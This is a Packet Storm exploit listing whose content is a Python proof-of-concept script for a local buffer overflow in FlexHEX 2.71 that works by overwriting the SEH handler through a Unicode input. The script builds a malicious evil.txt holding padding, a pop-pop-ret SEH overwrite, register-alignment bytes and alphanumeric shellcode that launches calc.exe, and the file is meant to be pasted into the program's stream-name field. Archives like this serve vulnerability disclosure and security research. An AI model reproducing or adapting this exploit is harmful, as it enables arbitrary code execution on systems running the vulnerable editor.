FlexHEX 2.71 Buffer Overflow

2019-04-07T00:00:00
ID PACKETSTORM:152430
Type packetstorm
Reporter Chris Au
Modified 2019-04-07T00:00:00

Description

                                        
                                            `#!/usr/bin/python -w  
  
#  
# Exploit Author: Chris Au  
# Exploit Title: FlexHEX 2.71 - Local Buffer Overflow (SEH Unicode)  
# Date: 06-04-2019  
# Vulnerable Software: FlexHEX 2.71  
# Vendor Homepage: http://www.flexhex.com  
# Version: 2.71  
# Software Link: http://www.flexhex.com/download/flexhex_setup.exe  
# Tested Windows Windows XP SP3  
#  
#  
# PoC  
# 1. generate evil.txt, copy contents to clipboard  
# 2. open FlexHEX Editor  
# 3. select "Stream", click "New Stream..."  
# 4. paste contents from clipboard in the "Stream Name:"  
# 5. select OK  
# 6. calc.exe  
#  
  
filename="evil.txt"  
junk = "\xcc" * 276  
nseh = "\x90\x45"  
seh = "\xd5\x52" #pop pop retn  
valign = (  
"\x45" #align  
"\x56" #push esi  
"\x45" #align  
"\x58" #pop eax  
"\x45" #align  
"\x05\x20\x11" #add eax,11002000  
"\x45" #align  
"\x2d\x1a\x11" #sub eax,11001a00  
"\x45" #align  
"\x50" #push eax  
"\x45" #align  
"\xc3" #retn  
)  
#nop to shell  
nop = "\x45" * 94  
#call calc.exe, bufferRegister=EAX  
shellcode = (  
"PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAI"  
"AQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIA"  
"JQYAZBABABABABkMAGB9u4JBkLK8qrM0ypyps0e9xeP1Y0RD4K"  
"npnPrkPRLLbkb2N42kt2lhlOegmzkvMaYodlMl0aqlKRnLo0Uq"  
"foLMzai7zBl2nrOgTKnrJptKNjoLBkpLjqahISQ8KQ8QpQRkaI"  
"kpKQYCbkMyzxHcnZq9bkNTTK9q9FMaYofLVa8OLMjaI7p8GpRU"  
"9flCamXxmksMo4d5JD1HrknxMTYq8Sc6RkJl0KtKnxKlkQFs4K"  
"zdtKKQJ0RiQ4NDLdOkOkC1pYOjOakOyPQOqOpZ4KN2zKTMaM0j"  
"kQbmu55bKP9pM0b0C8014KROQwkOIEek8pTuTbPVQXcvTU7MeM"  
"iohUOLm6qlyze09k7p0u9ugKa7mCPrbOqZ9pOcYoHURCPa0l0c"  
"Lnc51hOuipAA")  
fill = "\x45" * 5000  
buffer = junk + nseh + seh + valign + nop + shellcode + fill  
textfile = open(filename , 'w')  
textfile.write(buffer)  
textfile.close()  
`